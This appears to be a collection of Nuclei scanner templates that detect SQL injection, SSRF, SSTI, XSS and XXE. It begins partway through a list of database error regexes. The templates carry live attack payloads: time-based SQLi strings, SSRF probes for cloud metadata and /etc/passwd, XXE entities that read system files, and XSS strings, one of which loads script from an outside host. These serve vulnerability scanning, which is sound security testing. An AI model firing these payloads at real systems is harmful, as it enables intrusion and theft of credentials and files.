"Warning.*?\\Wpg_" 267 | - "valid PostgreSQL result" 268 | - "Npgsql\\." 269 | - "PG::SyntaxError:" 270 | - "org\\.postgresql\\.util\\.PSQLException" 271 | - "ERROR:\\s\\ssyntax error at or near" 272 | - "ERROR: parser: parse error at or near" 273 | - "PostgreSQL query failed" 274 | - "org\\.postgresql\\.jdbc" 275 | - "Pdo[./_\\\\]Pgsql" 276 | - "PSQLException" 277 | 278 | - type: regex 279 | name: microsoftsqlserver 280 | regex: 281 | - "Driver.*? SQL[\\-\\_\\ ]*Server" 282 | - "OLE DB.*? SQL Server" 283 | - "\\bSQL Server[^<"]+Driver" 284 | - "Warning.*?\\W(mssql|sqlsrv)_" 285 | - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" 286 | - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" 287 | - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 288 | - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" 289 | - "\\[SQL Server\\]" 290 | - "ODBC SQL Server Driver" 291 | - "ODBC Driver \\d+ for SQL Server" 292 | - "SQLServer JDBC Driver" 293 | - "com\\.jnetdirect\\.jsql" 294 | - "macromedia\\.jdbc\\.sqlserver" 295 | - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" 296 | - "com\\.microsoft\\.sqlserver\\.jdbc" 297 | - "Pdo[./_\\\\](Mssql|SqlSrv)" 298 | - "SQL(Srv|Server)Exception" 299 | - "Unclosed quotation mark after the character string" 300 | 301 | - type: regex 302 | name: microsoftaccess 303 | regex: 304 | - "Microsoft Access (\\d+ )?Driver" 305 | - "JET Database Engine" 306 | - "Access Database Engine" 307 | - "ODBC Microsoft Access" 308 | - "Syntax error \\(missing operator\\) in query expression" 309 | 310 | - type: regex 311 | name: oracle 312 | regex: 313 | - "\\bORA-\\d{5}" 314 | - "Oracle error" 315 | - "Oracle.*?Driver" 316 | - "Warning.*?\\W(oci|ora)_" 317 | - "quoted string not properly terminated" 318 | - "SQL command not properly ended" 319 | - "macromedia\\.jdbc\\.oracle" 320 | - "oracle\\.jdbc" 321 | - "Zend_Db_(Adapter|Statement)_Oracle_Exception" 322 | - "Pdo[./_\\\\](Oracle|OCI)" 323 | - "OracleException" 324 | 325 | - type: regex 326 | name: ibmdb2 327 | regex: 328 | - "CLI Driver.*?DB2" 329 | - "DB2 SQL error" 330 | - "\\bdb2_\\w+\\(" 331 | - "SQLCODE[=:\\d, -]+SQLSTATE" 332 | - "com\\.ibm\\.db2\\.jcc" 333 | - "Zend_Db_(Adapter|Statement)_Db2_Exception" 334 | - "Pdo[./_\\\\]Ibm" 335 | - "DB2Exception" 336 | - "ibm_db_dbi\\.ProgrammingError" 337 | 338 | - type: regex 339 | name: informix 340 | regex: 341 | - "Warning.*?\\Wifx_" 342 | - "Exception.*?Informix" 343 | - "Informix ODBC Driver" 344 | - "ODBC Informix driver" 345 | - "com\\.informix\\.jdbc" 346 | - "weblogic\\.jdbc\\.informix" 347 | - "Pdo[./_\\\\]Informix" 348 | - "IfxException" 349 | 350 | - type: regex 351 | name: firebird 352 | regex: 353 | - "Dynamic SQL Error" 354 | - "Warning.*?\\Wibase_" 355 | - "org\\.firebirdsql\\.jdbc" 356 | - "Pdo[./_\\\\]Firebird" 357 | 358 | - type: regex 359 | name: sqlite 360 | regex: 361 | - "SQLite/JDBCDriver" 362 | - "SQLite\\.Exception" 363 | - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" 364 | - "Warning.*?\\W(sqlite_|SQLite3::)" 365 | - "\\[SQLITE_ERROR\\]" 366 | - "SQLite error \\d+:" 367 | - "sqlite3.OperationalError:" 368 | - "SQLite3::SQLException" 369 | - "org\\.sqlite\\.JDBC" 370 | - "Pdo[./_\\\\]Sqlite" 371 | - "SQLiteException" 372 | 373 | - type: regex 374 | name: sapmaxdb 375 | regex: 376 | - "SQL error.*?POS([0-9]+)" 377 | - "Warning.*?\\Wmaxdb_" 378 | - "DriverSapDB" 379 | - "-3014.*?Invalid end of SQL statement" 380 | - "com\\.sap\\.dbtech\\.jdbc" 381 | - "\\[-3008\\].*?: Invalid keyword or missing delimiter" 382 | 383 | - type: regex 384 | name: sybase 385 | regex: 386 | - "Warning.*?\\Wsybase_" 387 | - "Sybase message" 388 | - "Sybase.*?Server message" 389 | - "SybSQLException" 390 | - "Sybase\\.Data\\.AseClient" 391 | - "com\\.sybase\\.jdbc" 392 | 393 | - type: regex 394 | name: ingres 395 | regex: 396 | - "Warning.*?\\Wingres_" 397 | - "Ingres SQLSTATE" 398 | - "Ingres\\W.*?Driver" 399 | - "com\\.ingres\\.gcf\\.jdbc" 400 | 401 | - type: regex 402 | name: frontbase 403 | regex: 404 | - "Exception (condition )?\\d+\\. Transaction rollback" 405 | - "com\\.frontbase\\.jdbc" 406 | - "Syntax error 1. Missing" 407 | - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." 408 | 409 | - type: regex 410 | name: hsqldb 411 | regex: 412 | - "Unexpected end of command in statement \\[" 413 | - "Unexpected token.*?in statement \\[" 414 | - "org\\.hsqldb\\.jdbc" 415 | 416 | - type: regex 417 | name: h2 418 | regex: 419 | - "org\\.h2\\.jdbc" 420 | - "\\[42000-192\\]" 421 | 422 | - type: regex 423 | name: monetdb 424 | regex: 425 | - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" 426 | - "\\[MonetDB\\]\\[ODBC Driver" 427 | - "nl\\.cwi\\.monetdb\\.jdbc" 428 | 429 | - type: regex 430 | name: apachederby 431 | regex: 432 | - "Syntax error: Encountered" 433 | - "org\\.apache\\.derby" 434 | - "ERROR 42X01" 435 | 436 | - type: regex 437 | name: vertica 438 | regex: 439 | - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" 440 | - "/vertica/Parser/scan" 441 | - "com\\.vertica\\.jdbc" 442 | - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" 443 | - "com\\.vertica\\.dsi\\.dataengine" 444 | 445 | - type: regex 446 | name: mckoi 447 | regex: 448 | - "com\\.mckoi\\.JDBCDriver" 449 | - "com\\.mckoi\\.database\\.jdbc" 450 | - "<REGEX_LITERAL>" 451 | 452 | - type: regex 453 | name: presto 454 | regex: 455 | - "com\\.facebook\\.presto\\.jdbc" 456 | - "io\\.prestosql\\.jdbc" 457 | - "com\\.simba\\.presto\\.jdbc" 458 | - "UNION query has different number of fields: \\d+, \\d+" 459 | 460 | - type: regex 461 | name: altibase 462 | regex: 463 | - "Altibase\\.jdbc\\.driver" 464 | 465 | - type: regex 466 | name: mimersql 467 | regex: 468 | - "com\\.mimer\\.jdbc" 469 | - "Syntax error,[^\\n]+assumed to mean" 470 | 471 | - type: regex 472 | name: cratedb 473 | regex: 474 | - "io\\.crate\\.client\\.jdbc" 475 | 476 | - type: regex 477 | name: cache 478 | regex: 479 | - "encountered after end of query" 480 | - "A comparison operator is required here" 481 | 482 | - type: regex 483 | name: raimadatabasemanager 484 | regex: 485 | - "-10048: Syntax error" 486 | - "rdmStmtPrepare\\(.+?\\) returned" 487 | 488 | - type: regex 489 | name: virtuoso 490 | regex: 491 | - "SQ074: Line \\d+:" 492 | - "SR185: Undefined procedure" 493 | - "SQ200: No table " 494 | - "Virtuoso S0002 Error" 495 | - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" 496 | -------------------------------------------------------------------------------- /sqli/time-based-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: time-based-sqli 2 | 3 | info: 4 | name: Time-Based Blind SQL Injection 5 | author: 0xKayala 6 | severity: critical 7 | description: | 8 | This Template detects time-based Blind SQL Injection vulnerability 9 | tags: sqli,dast,time-based,blind 10 | 11 | flow: http(1) && http(2) 12 | 13 | http: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}" 17 | 18 | matchers: 19 | - type: dsl 20 | dsl: 21 | - "duration<=7" 22 | 23 | - raw: 24 | - | 25 | @timeout: 20s 26 | GET / HTTP/1.1 27 | Host: {{Hostname}} 28 | 29 | payloads: 30 | injection: 31 | - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" 32 | - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" 33 | - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" 34 | - "if(now()=sysdate(),SLEEP(7),0)" 35 | - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" 36 | - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" 37 | 38 | fuzzing: 39 | - part: query 40 | type: replace 41 | mode: single 42 | fuzz: 43 | - "{{injection}}" 44 | 45 | stop-at-first-match: true 46 | matchers: 47 | - type: dsl 48 | dsl: 49 | - "duration>=7 && duration <=16" 50 | -------------------------------------------------------------------------------- /ssrf/blind-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: blind-ssrf 2 | 3 | info: 4 | name: Blind SSRF OAST Detection 5 | author: pdteam 6 | severity: medium 7 | metadata: 8 | max-request: 3 9 | tags: ssrf,dast,oast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | ssrf: 19 | - "{{interactsh-url}}" 20 | - "{{FQDN}}.{{interactsh-url}}" 21 | - "{{RDN}}.{{interactsh-url}}" 22 | 23 | fuzzing: 24 | - part: query 25 | mode: single 26 | values: 27 | - "https?://" # Replace HTTP URLs with alternatives 28 | fuzz: 29 | - "https://{{ssrf}}" 30 | 31 | - part: query 32 | mode: single 33 | values: 34 | - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace : with alternative 35 | fuzz: 36 | - "{{ssrf}}:80" 37 | 38 | stop-at-first-match: true 39 | matchers: 40 | - type: word 41 | part: interactsh_protocol # Confirms the HTTP Interaction 42 | words: 43 | - "http" 44 | # digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 45 | -------------------------------------------------------------------------------- /ssrf/response-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: response-ssrf 2 | 3 | info: 4 | name: Full Response SSRF Detection 5 | author: pdteam,pwnhxl,j4vaovo 6 | severity: high 7 | reference: 8 | - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py 9 | metadata: 10 | max-request: 12 11 | tags: ssrf,dast 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | ssrf: 21 | - 'http://{{interactsh-url}}' 22 | - 'http://{{FQDN}}.{{interactsh-url}}' 23 | - 'http://{{RDN}}.{{interactsh-url}}' 24 | - 'file:////./etc/./passwd' 25 | - 'file:///c:/./windows/./win.ini' 26 | - 'http://metadata.tencentyun.com/latest/meta-data/' 27 | - 'http://100.100.100.200/latest/meta-data/' 28 | - 'http://169.254.169.254/latest/meta-data/' 29 | - 'http://169.254.169.254/metadata/v1' 30 | - 'http://127.0.0.1:22' 31 | - 'http://127.0.0.1:3306' 32 | - 'dict://127.0.0.1:6379/info' 33 | 34 | fuzzing: 35 | - part: query 36 | mode: single 37 | keys: 38 | - callback 39 | - continue 40 | - data 41 | - dest 42 | - dir 43 | - domain 44 | - feed 45 | - file 46 | - host 47 | - html 48 | - imgurl 49 | - navigation 50 | - next 51 | - open 52 | - out 53 | - page 54 | - path 55 | - port 56 | - redirect 57 | - reference 58 | - return 59 | - show 60 | - site 61 | - to 62 | - uri 63 | - url 64 | - val 65 | - validate 66 | - view 67 | - window 68 | fuzz: 69 | - "{{ssrf}}" 70 | 71 | - part: query 72 | mode: single 73 | values: 74 | - "(https|http|file)(%3A%2F%2F|://)(.*?)" 75 | fuzz: 76 | - "{{ssrf}}" 77 | 78 | stop-at-first-match: true 79 | matchers-condition: or 80 | matchers: 81 | 82 | - type: word 83 | part: body 84 | words: 85 | - "Interactsh Server" 86 | 87 | - type: regex 88 | part: body 89 | regex: 90 | - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' 91 | 92 | - type: regex 93 | part: body 94 | regex: 95 | - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' 96 | 97 | - type: regex 98 | part: body 99 | regex: 100 | - '(\d.\d.\d)(.*?)mysql_native_password' 101 | 102 | - type: regex 103 | part: body 104 | regex: 105 | - 'root:.*?:[0-9]*:[0-9]*:' 106 | 107 | - type: word 108 | part: body 109 | words: 110 | - 'for 16-bit app support' 111 | 112 | - type: regex 113 | part: body 114 | regex: 115 | - 'dns-conf\/[\s\S]+instance\/' 116 | 117 | - type: regex 118 | part: body 119 | regex: 120 | - 'app-id[\s\S]+placement\/' 121 | 122 | - type: regex 123 | part: body 124 | regex: 125 | - 'ami-id[\s\S]+placement\/' 126 | 127 | - type: regex 128 | part: body 129 | regex: 130 | - 'id[\s\S]+interfaces\/' 131 | # digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 132 | -------------------------------------------------------------------------------- /ssti/reflection-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: reflection-ssti 2 | 3 | info: 4 | name: Reflected SSTI Arithmetic Based 5 | author: pdteam 6 | severity: medium 7 | reference: 8 | - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java 9 | - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update 10 | metadata: 11 | max-request: 14 12 | tags: ssti,dast 13 | 14 | variables: 15 | first: "{{rand_int(1000, 9999)}}" 16 | second: "{{rand_int(1000, 9999)}}" 17 | result: "{{to_number(first)*to_number(second)}}" 18 | 19 | http: 20 | - pre-condition: 21 | - type: dsl 22 | dsl: 23 | - 'method == "GET"' 24 | 25 | skip-variables-check: true 26 | payloads: 27 | ssti: 28 | - '{{concat("${", "{{first}}*{{second}}", "}")}}' 29 | - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' 30 | - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' 31 | - '{{concat("{", "{{first}}*{{second}}", "}")}}' 32 | - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' 33 | - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' 34 | - '{{concat("#{", "{{first}}*{{second}}", "}")}}' 35 | - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' 36 | - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' 37 | - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' 38 | - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' 39 | - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' 40 | - '{{concat("@(", "{{first}}*{{second}}", ")")}}' 41 | - '{{concat("{@", "{{first}}*{{second}}", "}")}}' 42 | 43 | fuzzing: 44 | - part: query 45 | type: postfix 46 | fuzz: 47 | - "{{ssti}}" 48 | 49 | stop-at-first-match: true 50 | matchers: 51 | - type: word 52 | part: body 53 | words: 54 | - "{{result}}" 55 | # digest: 4a0a00473045022100d708d1c94470ed6b8905dc03b2e87fd5408f31412d9cb8e002a271e13eae29ed02204c3c34ba3a148255d64a9513e36fe35a57032a0c9c5ede1d1c4d14d7813cc6c4:922c64590222798bb761d5b6d8e72950 56 | -------------------------------------------------------------------------------- /xss/blind-xss.yaml: -------------------------------------------------------------------------------- 1 | id: blind-xss 2 | 3 | info: 4 | name: Blind Cross Site Scripting 5 | author: 0xKayala (Satya Prakash) 6 | severity: high 7 | description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. 8 | tags: xss, blind-xss, dast, bxss, generic 9 | 10 | variables: 11 | first: "{{rand_int(10000, 99999)}}" 12 | script_payload_1: "" 13 | script_payload_2: "\"><41707" 14 | script_payload_3: "" 15 | script_payload_4: "" 16 | script_payload_5: "" 17 | script_payload_6: "" 18 | script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" 19 | script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" 20 | script_payload_9: "XX">" 21 | 22 | http: 23 | - method: GET 24 | path: 25 | - "{{BaseURL}}" 26 | 27 | payloads: 28 | blind: 29 | - "{{script_payload_1}}" 30 | - "{{script_payload_2}}" 31 | - "{{script_payload_3}}" 32 | - "{{script_payload_4}}" 33 | - "{{script_payload_5}}" 34 | - "{{script_payload_6}}" 35 | - "{{script_payload_7}}" 36 | - "{{script_payload_8}}" 37 | - "{{script_payload_9}}" 38 | 39 | fuzzing: 40 | - part: query 41 | type: postfix 42 | mode: single 43 | fuzz: 44 | - "{{blind}}" 45 | 46 | stop-at-first-match: true 47 | matchers-condition: and 48 | matchers: 49 | - type: word 50 | part: body 51 | words: 52 | - "{{script_payload_1}}" 53 | - "{{script_payload_2}}" 54 | - "{{script_payload_3}}" 55 | - "{{script_payload_4}}" 56 | - "{{script_payload_5}}" 57 | - "{{script_payload_6}}" 58 | - "{{script_payload_7}}" 59 | - "{{script_payload_8}}" 60 | - "{{script_payload_9}}" 61 | - type: word 62 | part: header 63 | words: 64 | - "text/html" 65 | -------------------------------------------------------------------------------- /xss/dom-xss.yaml: -------------------------------------------------------------------------------- 1 | id: dom-xss 2 | 3 | info: 4 | name: DOM Cross Site Scripting 5 | author: theamanrawat 6 | severity: medium 7 | description: | 8 | Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. 9 | impact: | 10 | Allows attackers to execute malicious scripts in the victim's browser. 11 | remediation: | 12 | Sanitize and validate user input to prevent script injection. 13 | tags: xss,dom,dast,headless 14 | variables: 15 | num: "{{rand_int(10000, 99999)}}" 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}" 21 | 22 | - action: waitload 23 | payloads: 24 | reflection: 25 | - "'\">

{{num}}

" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | mode: single 31 | fuzz: 32 | - "{{reflection}}" 33 | 34 | stop-at-first-match: true 35 | matchers-condition: and 36 | matchers: 37 | - type: word 38 | part: body 39 | words: 40 | - "

{{num}}

" 41 | 42 | - type: word 43 | part: header 44 | words: 45 | - "text/html" 46 | # digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 47 | -------------------------------------------------------------------------------- /xss/reflected-xss.yaml: -------------------------------------------------------------------------------- 1 | id: reflected-xss 2 | 3 | info: 4 | name: Reflected Cross-Site Scripting 5 | author: pdteam,0xKayala 6 | severity: medium 7 | metadata: 8 | max-request: 1 9 | tags: xss,rxss,dast 10 | 11 | variables: 12 | first: "{{rand_int(10000, 99999)}}" 13 | 14 | http: 15 | - pre-condition: 16 | - type: dsl 17 | dsl: 18 | - 'method == "GET"' 19 | 20 | payloads: 21 | reflection: 22 | - "'\"><{{first}}" 23 | - "" 24 | - "" 25 | - "'>" 26 | - "" 27 | - "" 28 | - "" 29 | - "" 30 | - "'>" 31 | - "'\/>" 32 | - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o" 33 | - "Click%20meXSS" 34 | - "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" 35 | - "" 36 | - "%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E" 37 | - "'%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'" 38 | 39 | fuzzing: 40 | - part: query 41 | type: postfix 42 | mode: single 43 | fuzz: 44 | - "{{reflection}}" 45 | 46 | stop-at-first-match: true 47 | matchers-condition: and 48 | matchers: 49 | - type: word 50 | part: body 51 | words: 52 | - "{{reflection}}" 53 | 54 | - type: word 55 | part: header 56 | words: 57 | - "text/html" 58 | # digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950 59 | -------------------------------------------------------------------------------- /xxe/generic-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: generic-xxe 2 | 3 | info: 4 | name: Generic XML external entity (XXE) 5 | author: pwnhxl 6 | severity: medium 7 | reference: 8 | - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py 9 | metadata: 10 | max-request: 2 11 | tags: dast,xxe 12 | 13 | variables: 14 | rletter: "{{rand_base(6,'abc')}}" 15 | 16 | http: 17 | - pre-condition: 18 | - type: dsl 19 | dsl: 20 | - 'method == "GET"' 21 | 22 | payloads: 23 | xxe: 24 | - ' ]>&{{rletter}};' 25 | - ' ]>&{{rletter}};' 26 | 27 | fuzzing: 28 | - part: query 29 | keys-regex: 30 | - "(.*?)xml(.*?)" 31 | fuzz: 32 | - "{{xxe}}" 33 | 34 | - part: query 35 | values: 36 | - "(" 37 | fuzz: 38 | - "{{xxe}}" 39 | 40 | stop-at-first-match: true 41 | matchers-condition: or 42 | matchers: 43 | - type: regex 44 | name: linux 45 | part: body 46 | regex: 47 | - 'root:.*?:[0-9]*:[0-9]*:' 48 | 49 | - type: word 50 | name: windows 51 | part: body 52 | words: 53 | - 'for 16-bit app support' 54 | # digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 55 | --------------------------------------------------------------------------------